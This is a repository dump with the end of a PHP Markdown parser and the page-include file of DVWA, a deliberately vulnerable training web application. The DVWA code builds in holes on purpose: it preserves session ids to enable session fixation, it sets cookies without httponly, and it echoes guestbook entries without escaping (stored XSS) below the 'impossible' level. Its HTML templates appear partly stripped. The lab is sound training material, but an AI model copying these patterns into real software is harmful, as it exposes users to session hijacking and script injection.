(preg_match('/^\\s*\\[(.*?)\\]/', $remainder, $matches))\n {\n $definition = strlen($matches[1]) ? $matches[1] : $Element['handler']['argument'];\n $definition = strtolower($definition);\n\n $extent += strlen($matches[0]);\n }\n else\n {\n $definition = strtolower($Element['handler']['argument']);\n }\n\n if ( ! isset($this->DefinitionData['Reference'][$definition]))\n {\n return;\n }\n\n $Definition = $this->DefinitionData['Reference'][$definition];\n\n $Element['attributes']['href'] = $Definition['url'];\n $Element['attributes']['title'] = $Definition['title'];\n }\n\n return array(\n 'extent' => $extent,\n 'element' => $Element,\n );\n }\n\n protected function inlineMarkup($Excerpt)\n {\n if ($this->markupEscaped or $this->safeMode or strpos($Excerpt['text'], '>') === false)\n {\n return;\n }\n\n if ($Excerpt['text'][1] === '/' and preg_match('/^<\\/\\w[\\w-]*+[ ]*+>/s', $Excerpt['text'], $matches))\n {\n return array(\n 'element' => array('rawHtml' => $matches[0]),\n 'extent' => strlen($matches[0]),\n );\n }\n\n if ($Excerpt['text'][1] === '!' and preg_match('/^/s', $Excerpt['text'], $matches))\n {\n return array(\n 'element' => array('rawHtml' => $matches[0]),\n 'extent' => strlen($matches[0]),\n );\n }\n\n if ($Excerpt['text'][1] !== ' ' and preg_match('/^<\\w[\\w-]*+(?:[ ]*+'.$this->regexHtmlAttribute.')*+[ ]*+\\/?>/s', $Excerpt['text'], $matches))\n {\n return array(\n 'element' => array('rawHtml' => $matches[0]),\n 'extent' => strlen($matches[0]),\n );\n }\n }\n\n protected function inlineSpecialCharacter($Excerpt)\n {\n if (substr($Excerpt['text'], 1, 1) !== ' ' and strpos($Excerpt['text'], ';') !== false\n and preg_match('/^&(#?+[0-9a-zA-Z]++);/', $Excerpt['text'], $matches)\n ) {\n return array(\n 'element' => array('rawHtml' => '&' . $matches[1] . ';'),\n 'extent' => strlen($matches[0]),\n );\n }\n\n return;\n }\n\n protected function inlineStrikethrough($Excerpt)\n {\n if ( ! isset($Excerpt['text'][1]))\n {\n return;\n }\n\n if ($Excerpt['text'][1] === '~' and preg_match('/^~~(?=\\S)(.+?)(?<=\\S)~~/', $Excerpt['text'], $matches))\n {\n return array(\n 'extent' => strlen($matches[0]),\n 'element' => array(\n 'name' => 'del',\n 'handler' => array(\n 'function' => 'lineElements',\n 'argument' => $matches[1],\n 'destination' => 'elements',\n )\n ),\n );\n }\n }\n\n protected function inlineUrl($Excerpt)\n {\n if ($this->urlsLinked !== true or ! isset($Excerpt['text'][2]) or $Excerpt['text'][2] !== '/')\n {\n return;\n }\n\n if (strpos($Excerpt['context'], 'http') !== false\n and preg_match('/\\bhttps?+:[\\/]{2}[^\\s<]+\\b\\/*+/ui', $Excerpt['context'], $matches, PREG_OFFSET_CAPTURE)\n ) {\n $url = $matches[0][0];\n\n $Inline = array(\n 'extent' => strlen($matches[0][0]),\n 'position' => $matches[0][1],\n 'element' => array(\n 'name' => 'a',\n 'text' => $url,\n 'attributes' => array(\n 'href' => $url,\n ),\n ),\n );\n\n return $Inline;\n }\n }\n\n protected function inlineUrlTag($Excerpt)\n {\n if (strpos($Excerpt['text'], '>') !== false and preg_match('/^<(\\w++:\\/{2}[^ >]++)>/i', $Excerpt['text'], $matches))\n {\n $url = $matches[1];\n\n return array(\n 'extent' => strlen($matches[0]),\n 'element' => array(\n 'name' => 'a',\n 'text' => $url,\n 'attributes' => array(\n 'href' => $url,\n ),\n ),\n );\n }\n }\n\n # ~\n\n protected function unmarkedText($text)\n {\n $Inline = $this->inlineText($text);\n return $this->element($Inline['element']);\n }\n\n #\n # Handlers\n #\n\n protected function handle(array $Element)\n {\n if (isset($Element['handler']))\n {\n if (!isset($Element['nonNestables']))\n {\n $Element['nonNestables'] = array();\n }\n\n if (is_string($Element['handler']))\n {\n $function = $Element['handler'];\n $argument = $Element['text'];\n unset($Element['text']);\n $destination = 'rawHtml';\n }\n else\n {\n $function = $Element['handler']['function'];\n $argument = $Element['handler']['argument'];\n $destination = $Element['handler']['destination'];\n }\n\n $Element[$destination] = $this->{$function}($argument, $Element['nonNestables']);\n\n if ($destination === 'handler')\n {\n $Element = $this->handle($Element);\n }\n\n unset($Element['handler']);\n }\n\n return $Element;\n }\n\n protected function handleElementRecursive(array $Element)\n {\n return $this->elementApplyRecursive(array($this, 'handle'), $Element);\n }\n\n protected function handleElementsRecursive(array $Elements)\n {\n return $this->elementsApplyRecursive(array($this, 'handle'), $Elements);\n }\n\n protected function elementApplyRecursive($closure, array $Element)\n {\n $Element = call_user_func($closure, $Element);\n\n if (isset($Element['elements']))\n {\n $Element['elements'] = $this->elementsApplyRecursive($closure, $Element['elements']);\n }\n elseif (isset($Element['element']))\n {\n $Element['element'] = $this->elementApplyRecursive($closure, $Element['element']);\n }\n\n return $Element;\n }\n\n protected function elementApplyRecursiveDepthFirst($closure, array $Element)\n {\n if (isset($Element['elements']))\n {\n $Element['elements'] = $this->elementsApplyRecursiveDepthFirst($closure, $Element['elements']);\n }\n elseif (isset($Element['element']))\n {\n $Element['element'] = $this->elementsApplyRecursiveDepthFirst($closure, $Element['element']);\n }\n\n $Element = call_user_func($closure, $Element);\n\n return $Element;\n }\n\n protected function elementsApplyRecursive($closure, array $Elements)\n {\n foreach ($Elements as &$Element)\n {\n $Element = $this->elementApplyRecursive($closure, $Element);\n }\n\n return $Elements;\n }\n\n protected function elementsApplyRecursiveDepthFirst($closure, array $Elements)\n {\n foreach ($Elements as &$Element)\n {\n $Element = $this->elementApplyRecursiveDepthFirst($closure, $Element);\n }\n\n return $Elements;\n }\n\n protected function element(array $Element)\n {\n if ($this->safeMode)\n {\n $Element = $this->sanitiseElement($Element);\n }\n\n # identity map if element has no handler\n $Element = $this->handle($Element);\n\n $hasName = isset($Element['name']);\n\n $markup = '';\n\n if ($hasName)\n {\n $markup .= '<' . $Element['name'];\n\n if (isset($Element['attributes']))\n {\n foreach ($Element['attributes'] as $name => $value)\n {\n if ($value === null)\n {\n continue;\n }\n\n $markup .= \" $name=\\\"\".self::escape($value).'\"';\n }\n }\n }\n\n $permitRawHtml = false;\n\n if (isset($Element['text']))\n {\n $text = $Element['text'];\n }\n // very strongly consider an alternative if you're writing an\n // extension\n elseif (isset($Element['rawHtml']))\n {\n $text = $Element['rawHtml'];\n\n $allowRawHtmlInSafeMode = isset($Element['allowRawHtmlInSafeMode']) && $Element['allowRawHtmlInSafeMode'];\n $permitRawHtml = !$this->safeMode || $allowRawHtmlInSafeMode;\n }\n\n $hasContent = isset($text) || isset($Element['element']) || isset($Element['elements']);\n\n if ($hasContent)\n {\n $markup .= $hasName ? '>' : '';\n\n if (isset($Element['elements']))\n {\n $markup .= $this->elements($Element['elements']);\n }\n elseif (isset($Element['element']))\n {\n $markup .= $this->element($Element['element']);\n }\n else\n {\n if (!$permitRawHtml)\n {\n $markup .= self::escape($text, true);\n }\n else\n {\n $markup .= $text;\n }\n }\n\n $markup .= $hasName ? '' : '';\n }\n elseif ($hasName)\n {\n $markup .= ' />';\n }\n\n return $markup;\n }\n\n protected function elements(array $Elements)\n {\n $markup = '';\n\n $autoBreak = true;\n\n foreach ($Elements as $Element)\n {\n if (empty($Element))\n {\n continue;\n }\n\n $autoBreakNext = (isset($Element['autobreak'])\n ? $Element['autobreak'] : isset($Element['name'])\n );\n // (autobreak === false) covers both sides of an element\n $autoBreak = !$autoBreak ? $autoBreak : $autoBreakNext;\n\n $markup .= ($autoBreak ? \"\\n\" : '') . $this->element($Element);\n $autoBreak = $autoBreakNext;\n }\n\n $markup .= $autoBreak ? \"\\n\" : '';\n\n return $markup;\n }\n\n # ~\n\n protected function li($lines)\n {\n $Elements = $this->linesElements($lines);\n\n if ( ! in_array('', $lines)\n and isset($Elements[0]) and isset($Elements[0]['name'])\n and $Elements[0]['name'] === 'p'\n ) {\n unset($Elements[0]['name']);\n }\n\n return $Elements;\n }\n\n #\n # AST Convenience\n #\n\n /**\n * Replace occurrences $regexp with $Elements in $text. Return an array of\n * elements representing the replacement.\n */\n protected static function pregReplaceElements($regexp, $Elements, $text)\n {\n $newElements = array();\n\n while (preg_match($regexp, $text, $matches, PREG_OFFSET_CAPTURE))\n {\n $offset = $matches[0][1];\n $before = substr($text, 0, $offset);\n $after = substr($text, $offset + strlen($matches[0][0]));\n\n $newElements[] = array('text' => $before);\n\n foreach ($Elements as $Element)\n {\n $newElements[] = $Element;\n }\n\n $text = $after;\n }\n\n $newElements[] = array('text' => $text);\n\n return $newElements;\n }\n\n #\n # Deprecated Methods\n #\n\n function parse($text)\n {\n $markup = $this->text($text);\n\n return $markup;\n }\n\n protected function sanitiseElement(array $Element)\n {\n static $goodAttribute = '/^[a-zA-Z0-9][a-zA-Z0-9-_]*+$/';\n static $safeUrlNameToAtt = array(\n 'a' => 'href',\n 'img' => 'src',\n );\n\n if ( ! isset($Element['name']))\n {\n unset($Element['attributes']);\n return $Element;\n }\n\n if (isset($safeUrlNameToAtt[$Element['name']]))\n {\n $Element = $this->filterUnsafeUrlInAttribute($Element, $safeUrlNameToAtt[$Element['name']]);\n }\n\n if ( ! empty($Element['attributes']))\n {\n foreach ($Element['attributes'] as $att => $val)\n {\n # filter out badly parsed attribute\n if ( ! preg_match($goodAttribute, $att))\n {\n unset($Element['attributes'][$att]);\n }\n # dump onevent attribute\n elseif (self::striAtStart($att, 'on'))\n {\n unset($Element['attributes'][$att]);\n }\n }\n }\n\n return $Element;\n }\n\n protected function filterUnsafeUrlInAttribute(array $Element, $attribute)\n {\n foreach ($this->safeLinksWhitelist as $scheme)\n {\n if (self::striAtStart($Element['attributes'][$attribute], $scheme))\n {\n return $Element;\n }\n }\n\n $Element['attributes'][$attribute] = str_replace(':', '%3A', $Element['attributes'][$attribute]);\n\n return $Element;\n }\n\n #\n # Static Methods\n #\n\n protected static function escape($text, $allowQuotes = false)\n {\n return htmlspecialchars($text, $allowQuotes ? ENT_NOQUOTES : ENT_QUOTES, 'UTF-8');\n }\n\n protected static function striAtStart($string, $needle)\n {\n $len = strlen($needle);\n\n if ($len > strlen($string))\n {\n return false;\n }\n else\n {\n return strtolower(substr($string, 0, $len)) === strtolower($needle);\n }\n }\n\n static function instance($name = 'default')\n {\n if (isset(self::$instances[$name]))\n {\n return self::$instances[$name];\n }\n\n $instance = new static();\n\n self::$instances[$name] = $instance;\n\n return $instance;\n }\n\n private static $instances = array();\n\n #\n # Fields\n #\n\n protected $DefinitionData;\n\n #\n # Read-Only\n\n protected $specialCharacters = array(\n '\\\\', '`', '*', '_', '{', '}', '[', ']', '(', ')', '>', '#', '+', '-', '.', '!', '|', '~'\n );\n\n protected $StrongRegex = array(\n '*' => '/^[*]{2}((?:\\\\\\\\\\*|[^*]|[*][^*]*+[*])+?)[*]{2}(?![*])/s',\n '_' => '/^__((?:\\\\\\\\_|[^_]|_[^_]*+_)+?)__(?!_)/us',\n );\n\n protected $EmRegex = array(\n '*' => '/^[*]((?:\\\\\\\\\\*|[^*]|[*][*][^*]+?[*][*])+?)[*](?![*])/s',\n '_' => '/^_((?:\\\\\\\\_|[^_]|__[^_]*__)+?)_(?!_)\\b/us',\n );\n\n protected $regexHtmlAttribute = '[a-zA-Z_:][\\w:.-]*+(?:\\s*+=\\s*+(?:[^\"\\'=<>`\\s]+|\"[^\"]*+\"|\\'[^\\']*+\\'))?+';\n\n protected $voidElements = array(\n 'area', 'base', 'br', 'col', 'command', 'embed', 'hr', 'img', 'input', 'link', 'meta', 'param', 'source',\n );\n\n protected $textLevelElements = array(\n 'a', 'br', 'bdo', 'abbr', 'blink', 'nextid', 'acronym', 'basefont',\n 'b', 'em', 'big', 'cite', 'small', 'spacer', 'listing',\n 'i', 'rp', 'del', 'code', 'strike', 'marquee',\n 'q', 'rt', 'ins', 'font', 'strong',\n 's', 'tt', 'kbd', 'mark',\n 'u', 'xm', 'sub', 'nobr',\n 'sup', 'ruby',\n 'var', 'span',\n 'wbr', 'time',\n );\n}\n" }, { "path": "dvwa/includes/dvwaPage.inc.php", "content": " $maxlifetime,\n\t\t'path' => '/',\n\t\t'domain' => $domain,\n\t\t'secure' => $secure,\n\t\t'httponly' => $httponly,\n\t\t'samesite' => $samesite\n\t]);\n\n\t/*\n\t * We need to force a new Set-Cookie header with the updated flags by updating\n\t * the session id, either regenerating it or setting it to a value, because\n\t * session_start() might not generate a Set-Cookie header if a cookie already\n\t * exists.\n\t *\n\t * For impossible security level, we regenerate the session id, PHP will\n\t * generate a new random id. This is good security practice because it\n\t * prevents the reuse of a previous unauthenticated id that an attacker\n\t * might have knowledge of (aka session fixation attack).\n *\n\t * For lower levels, we want to allow session fixation attacks, so if an id\n\t * already exists, we don't want it to change after authentication. We thus\n\t * set the id to its previous value using session_id(), which will force\n\t * the Set-Cookie header.\n\t*/\n\tif ($security_level == 'impossible') {\n\t\tsession_start();\n\t\tsession_regenerate_id(); // force a new id to be generated\n\t}\n\telse {\n\t\tif (isset($_COOKIE[session_name()])) // if a session id already exists\n\t\t\tsession_id($_COOKIE[session_name()]); // we keep the same id\n\t\tsession_start(); // otherwise a new one will be generated here\n\t}\n}\n\nif (array_key_exists (\"Login\", $_POST) && $_POST['Login'] == \"Login\") {\n\tdvwa_start_session();\n} else {\n\tif (!session_id()) {\n\t\tsession_start();\n\t}\n}\n\nif (!array_key_exists (\"default_locale\", $_DVWA)) {\n\t$_DVWA[ 'default_locale' ] = \"en\";\n}\n\ndvwaLocaleSet( $_DVWA[ 'default_locale' ] );\n\n// Start session functions --\n\nfunction &dvwaSessionGrab() {\n\tif( !isset( $_SESSION[ 'dvwa' ] ) ) {\n\t\t$_SESSION[ 'dvwa' ] = array();\n\t}\n\treturn $_SESSION[ 'dvwa' ];\n}\n\n\nfunction dvwaPageStartup( $pActions ) {\n\tif (in_array('authenticated', $pActions)) {\n\t\tif( !dvwaIsLoggedIn()) {\n\t\t\tdvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'login.php' );\n\t\t}\n\t}\n}\n\nfunction dvwaLogin( $pUsername ) {\n\t$dvwaSession =& dvwaSessionGrab();\n\t$dvwaSession[ 'username' ] = $pUsername;\n}\n\n\nfunction dvwaIsLoggedIn() {\n\tglobal $_DVWA;\n\n\tif (array_key_exists(\"disable_authentication\", $_DVWA) && $_DVWA['disable_authentication']) {\n\t\treturn true;\n\t}\n\t$dvwaSession =& dvwaSessionGrab();\n\treturn isset( $dvwaSession[ 'username' ] );\n}\n\n\nfunction dvwaLogout() {\n\t$dvwaSession =& dvwaSessionGrab();\n\tunset( $dvwaSession[ 'username' ] );\n}\n\n\nfunction dvwaPageReload() {\n\tif ( array_key_exists( 'HTTP_X_FORWARDED_PREFIX' , $_SERVER )) {\n\t\tdvwaRedirect( $_SERVER[ 'HTTP_X_FORWARDED_PREFIX' ] . $_SERVER[ 'PHP_SELF' ] );\n\t}\n\telse {\n\t\tdvwaRedirect( $_SERVER[ 'PHP_SELF' ] );\n\t}\n}\n\nfunction dvwaCurrentUser() {\n\t$dvwaSession =& dvwaSessionGrab();\n\treturn ( isset( $dvwaSession[ 'username' ]) ? $dvwaSession[ 'username' ] : 'Unknown') ;\n}\n\n// -- END (Session functions)\n\nfunction &dvwaPageNewGrab() {\n\t$returnArray = array(\n\t\t'title' => 'Damn Vulnerable Web Application (DVWA)',\n\t\t'title_separator' => ' :: ',\n\t\t'body' => '',\n\t\t'page_id' => '',\n\t\t'help_button' => '',\n\t\t'source_button' => '',\n\t);\n\treturn $returnArray;\n}\n\n\nfunction dvwaThemeGet() {\n\tif (isset($_COOKIE['theme'])) {\n\t\treturn $_COOKIE[ 'theme' ];\n\t}\n\treturn 'light';\n}\n\n\nfunction dvwaSecurityLevelGet() {\n\tglobal $_DVWA;\n\n\t// If there is a security cookie, that takes priority.\n\tif (isset($_COOKIE['security'])) {\n\t\treturn $_COOKIE[ 'security' ];\n\t}\n\n\t// If not, check to see if authentication is disabled, if it is, use\n\t// the default security level.\n\tif (array_key_exists(\"disable_authentication\", $_DVWA) && $_DVWA['disable_authentication']) {\n\t\treturn $_DVWA[ 'default_security_level' ];\n\t}\n\n\t// Worse case, set the level to impossible.\n\treturn 'impossible';\n}\n\nfunction dvwaSecurityLevelSet( $pSecurityLevel ) {\n\tif( $pSecurityLevel == 'impossible' ) {\n\t\t$httponly = true;\n\t}\n\telse {\n\t\t$httponly = false;\n\t}\n\n\tsetcookie( 'security', $pSecurityLevel, 0, \"/\", \"\", false, $httponly );\n\t$_COOKIE['security'] = $pSecurityLevel;\n}\n\nfunction dvwaLocaleGet() {\n\t$dvwaSession =& dvwaSessionGrab();\n\treturn $dvwaSession[ 'locale' ];\n}\n\nfunction dvwaSQLiDBGet() {\n\tglobal $_DVWA;\n\treturn $_DVWA['SQLI_DB'];\n}\n\nfunction dvwaLocaleSet( $pLocale ) {\n\t$dvwaSession =& dvwaSessionGrab();\n\t$locales = array('en', 'zh');\n\tif( in_array( $pLocale, $locales) ) {\n\t\t$dvwaSession[ 'locale' ] = $pLocale;\n\t} else {\n\t\t$dvwaSession[ 'locale' ] = 'en';\n\t}\n}\n\n// Start message functions --\n\nfunction dvwaMessagePush( $pMessage ) {\n\t$dvwaSession =& dvwaSessionGrab();\n\tif( !isset( $dvwaSession[ 'messages' ] ) ) {\n\t\t$dvwaSession[ 'messages' ] = array();\n\t}\n\t$dvwaSession[ 'messages' ][] = $pMessage;\n}\n\n\nfunction dvwaMessagePop() {\n\t$dvwaSession =& dvwaSessionGrab();\n\tif( !isset( $dvwaSession[ 'messages' ] ) || count( $dvwaSession[ 'messages' ] ) == 0 ) {\n\t\treturn false;\n\t}\n\treturn array_shift( $dvwaSession[ 'messages' ] );\n}\n\n\nfunction messagesPopAllToHtml() {\n\t$messagesHtml = '';\n\twhile( $message = dvwaMessagePop() ) { // TODO- sharpen!\n\t\t$messagesHtml .= \"\";\n\t}\n\n\treturn $messagesHtml;\n}\n\n// --END (message functions)\n\nfunction dvwaHtmlEcho( $pPage ) {\n\t$menuBlocks = array();\n\n\t$menuBlocks[ 'home' ] = array();\n\tif( dvwaIsLoggedIn() ) {\n\t\t$menuBlocks[ 'home' ][] = array( 'id' => 'home', 'name' => 'Home', 'url' => '.' );\n\t\t$menuBlocks[ 'home' ][] = array( 'id' => 'instructions', 'name' => 'Instructions', 'url' => 'instructions.php' );\n\t\t$menuBlocks[ 'home' ][] = array( 'id' => 'setup', 'name' => 'Setup / Reset DB', 'url' => 'setup.php' );\n\t}\n\telse {\n\t\t$menuBlocks[ 'home' ][] = array( 'id' => 'setup', 'name' => 'Setup DVWA', 'url' => 'setup.php' );\n\t\t$menuBlocks[ 'home' ][] = array( 'id' => 'instructions', 'name' => 'Instructions', 'url' => 'instructions.php' );\n\t}\n\n\tif( dvwaIsLoggedIn() ) {\n\t\t$menuBlocks[ 'vulnerabilities' ] = array();\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'brute', 'name' => 'Brute Force', 'url' => 'vulnerabilities/brute/' );\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'exec', 'name' => 'Command Injection', 'url' => 'vulnerabilities/exec/' );\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'csrf', 'name' => 'CSRF', 'url' => 'vulnerabilities/csrf/' );\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'fi', 'name' => 'File Inclusion', 'url' => 'vulnerabilities/fi/.?page=include.php' );\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'upload', 'name' => 'File Upload', 'url' => 'vulnerabilities/upload/' );\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'captcha', 'name' => 'Insecure CAPTCHA', 'url' => 'vulnerabilities/captcha/' );\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'sqli', 'name' => 'SQL Injection', 'url' => 'vulnerabilities/sqli/' );\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'sqli_blind', 'name' => 'SQL Injection (Blind)', 'url' => 'vulnerabilities/sqli_blind/' );\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'weak_id', 'name' => 'Weak Session IDs', 'url' => 'vulnerabilities/weak_id/' );\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_d', 'name' => 'XSS (DOM)', 'url' => 'vulnerabilities/xss_d/' );\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_r', 'name' => 'XSS (Reflected)', 'url' => 'vulnerabilities/xss_r/' );\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_s', 'name' => 'XSS (Stored)', 'url' => 'vulnerabilities/xss_s/' );\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'csp', 'name' => 'CSP Bypass', 'url' => 'vulnerabilities/csp/' );\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'javascript', 'name' => 'JavaScript Attacks', 'url' => 'vulnerabilities/javascript/' );\n\t\tif (dvwaCurrentUser() == \"admin\") {\n\t\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'authbypass', 'name' => 'Authorisation Bypass', 'url' => 'vulnerabilities/authbypass/' );\n\t\t}\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'open_redirect', 'name' => 'Open HTTP Redirect', 'url' => 'vulnerabilities/open_redirect/' );\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'encryption', 'name' => 'Cryptography', 'url' => 'vulnerabilities/cryptography/' );\n\t\t$menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'api', 'name' => 'API', 'url' => 'vulnerabilities/api/' );\n\t\t# $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'bac', 'name' => 'Broken Access Control', 'url' => 'vulnerabilities/bac/' );\n\t}\n\n\t$menuBlocks[ 'meta' ] = array();\n\tif( dvwaIsLoggedIn() ) {\n\t\t$menuBlocks[ 'meta' ][] = array( 'id' => 'security', 'name' => 'DVWA Security', 'url' => 'security.php' );\n\t\t$menuBlocks[ 'meta' ][] = array( 'id' => 'phpinfo', 'name' => 'PHP Info', 'url' => 'phpinfo.php' );\n\t}\n\t$menuBlocks[ 'meta' ][] = array( 'id' => 'about', 'name' => 'About', 'url' => 'about.php' );\n\n\tif( dvwaIsLoggedIn() ) {\n\t\t$menuBlocks[ 'logout' ] = array();\n\t\t$menuBlocks[ 'logout' ][] = array( 'id' => 'logout', 'name' => 'Logout', 'url' => 'logout.php' );\n\t}\n\n\t$menuHtml = '';\n\n\tforeach( $menuBlocks as $menuBlock ) {\n\t\t$menuBlockHtml = '';\n\t\tforeach( $menuBlock as $menuItem ) {\n\t\t\t$selectedClass = ( $menuItem[ 'id' ] == $pPage[ 'page_id' ] ) ? 'selected' : '';\n\t\t\t$fixedUrl = DVWA_WEB_PAGE_TO_ROOT.$menuItem[ 'url' ];\n\t\t\t$menuBlockHtml .= \"
{$messagesHtml}
\";\n\t}\n\n\t$systemInfoHtml = \"\";\n\tif( dvwaIsLoggedIn() )\n\t\t$systemInfoHtml = \"{$userInfoHtml}
{$securityLevelHtml}
{$localeHtml}
{$sqliDbHtml}
\";\n\tif( $pPage[ 'source_button' ] ) {\n\t\t$systemInfoHtml = dvwaButtonSourceHtmlGet( $pPage[ 'source_button' ] ) . \" $systemInfoHtml\";\n\t}\n\tif( $pPage[ 'help_button' ] ) {\n\t\t$systemInfoHtml = dvwaButtonHelpHtmlGet( $pPage[ 'help_button' ] ) . \" $systemInfoHtml\";\n\t}\n\n\t// Send Headers + main HTML code\n\tHeader( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1\n\tHeader( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers...\n\tHeader( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past\n\n\techo \"\n\n\n\n\t\n\t\t\n\n\t\t{$securityLevelHtml}
{$localeHtml}
{$sqliDbHtml}
\n\n\t\t\t
\n\n\t\n\n\";\n}\n\n\nfunction dvwaHelpHtmlEcho( $pPage ) {\n\t// Send Headers\n\tHeader( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1\n\tHeader( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers...\n\tHeader( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past\n\n\techo \"\n\n\n\n\t\n\n\t\t\n\n\t\t\n\n\t\t\t\t![\\\"Damn](\\\"\")
\n \n \n \n\t\t\t
\n\n\t\t\t\n\n\t\t\t\n\n\t\t\t\t{$pPage[ 'body' ]}\n\t\t\t\t
\n\t\t\t\t{$messagesHtml}\n\n\t\t\t
\n\n\t\t\t\n\t\t\t\t{$messagesHtml}\n\n\t\t\t
\n\t\t\t
\n\n\t\t\t\n\t\t\t\t{$systemInfoHtml}\n\t\t\t
\n\n\t\t\t\n\n\t\t\n\n\t\t\t{$pPage[ 'body' ]}\n\n\t\t
\n\n\t\n\n\";\n}\n\n\nfunction dvwaSourceHtmlEcho( $pPage ) {\n\t// Send Headers\n\tHeader( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1\n\tHeader( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers...\n\tHeader( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past\n\n\techo \"\n\n\n\n\t\n\n\t\t\n\n\t\t\n\n\t\t\t{$pPage[ 'body' ]}\n\n\t\t
\n\n\t\n\n\";\n}\n\n// To be used on all external links --\nfunction dvwaExternalLinkUrlGet( $pLink,$text=null ) {\n\tif(is_null( $text ) || $text == \"\") {\n\t\treturn '' . $pLink . '';\n\t}\n\telse {\n\t\treturn '' . $text . '';\n\t}\n}\n// -- END ( external links)\n\nfunction dvwaButtonHelpHtmlGet( $pId ) {\n\t$security = dvwaSecurityLevelGet();\n\t$locale = dvwaLocaleGet();\n\treturn \"\";\n}\n\n\nfunction dvwaButtonSourceHtmlGet( $pId ) {\n\t$security = dvwaSecurityLevelGet();\n\treturn \"\";\n}\n\n\n// Database Management --\n\nif( $DBMS == 'MySQL' ) {\n\t$DBMS = htmlspecialchars(strip_tags( $DBMS ));\n}\nelseif( $DBMS == 'PGSQL' ) {\n\t$DBMS = htmlspecialchars(strip_tags( $DBMS ));\n}\nelse {\n\t$DBMS = \"No DBMS selected.\";\n}\n\nfunction dvwaDatabaseConnect() {\n\tglobal $_DVWA;\n\tglobal $DBMS;\n\t//global $DBMS_connError;\n\tglobal $db;\n\tglobal $sqlite_db_connection;\n\n\tif( $DBMS == 'MySQL' ) {\n\t\tif( !@($GLOBALS[\"___mysqli_ston\"] = mysqli_connect( $_DVWA[ 'db_server' ], $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ], \"\", $_DVWA[ 'db_port' ] ))\n\t\t|| !@((bool)mysqli_query($GLOBALS[\"___mysqli_ston\"], \"USE \" . $_DVWA[ 'db_database' ])) ) {\n\t\t\t//die( $DBMS_connError );\n\t\t\tdvwaLogout();\n\t\t\tdvwaMessagePush( 'Unable to connect to the database.' . mysqli_error($GLOBALS[\"___mysqli_ston\"]));\n\t\t\tdvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'setup.php' );\n\t\t}\n\t\t// MySQL PDO Prepared Statements (for impossible levels)\n\t\t$db = new PDO('mysql:host=' . $_DVWA[ 'db_server' ].';dbname=' . $_DVWA[ 'db_database' ].';port=' . $_DVWA['db_port'] . ';charset=utf8', $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ]);\n\t\t$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);\n\t\t$db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);\n\t}\n\telseif( $DBMS == 'PGSQL' ) {\n\t\t//$dbconn = pg_connect(\"host={$_DVWA[ 'db_server' ]} dbname={$_DVWA[ 'db_database' ]} user={$_DVWA[ 'db_user' ]} password={$_DVWA[ 'db_password' ]}\"\n\t\t//or die( $DBMS_connError );\n\t\tdvwaMessagePush( 'PostgreSQL is not currently supported.' );\n\t\tdvwaPageReload();\n\t}\n\telse {\n\t\tdie ( \"Unknown {$DBMS} selected.\" );\n\t}\n\n\tif ($_DVWA['SQLI_DB'] == SQLITE) {\n\t\t$location = DVWA_WEB_PAGE_TO_ROOT . \"database/\" . $_DVWA['SQLITE_DB'];\n\t\t$sqlite_db_connection = new SQLite3($location);\n\t\t$sqlite_db_connection->enableExceptions(true);\n\t#\tprint \"sqlite db setup\";\n\t}\n}\n\n// -- END (Database Management)\n\n\nfunction dvwaRedirect( $pLocation ) {\n\tsession_commit();\n\theader( \"Location: {$pLocation}\" );\n\texit;\n}\n\n// XSS Stored guestbook function --\nfunction dvwaGuestbook() {\n\t$query = \"SELECT name, comment FROM guestbook\";\n\t$result = mysqli_query($GLOBALS[\"___mysqli_ston\"], $query );\n\n\t$guestbook = '';\n\n\twhile( $row = mysqli_fetch_row( $result ) ) {\n\t\tif( dvwaSecurityLevelGet() == 'impossible' ) {\n\t\t\t$name = htmlspecialchars( $row[0] );\n\t\t\t$comment = htmlspecialchars( $row[1] );\n\t\t}\n\t\telse {\n\t\t\t$name = $row[0];\n\t\t\t$comment = $row[1];\n\t\t}\n\n\t\t$guestbook .= \"
Name: {$name}
\" . \"Message: {$comment}
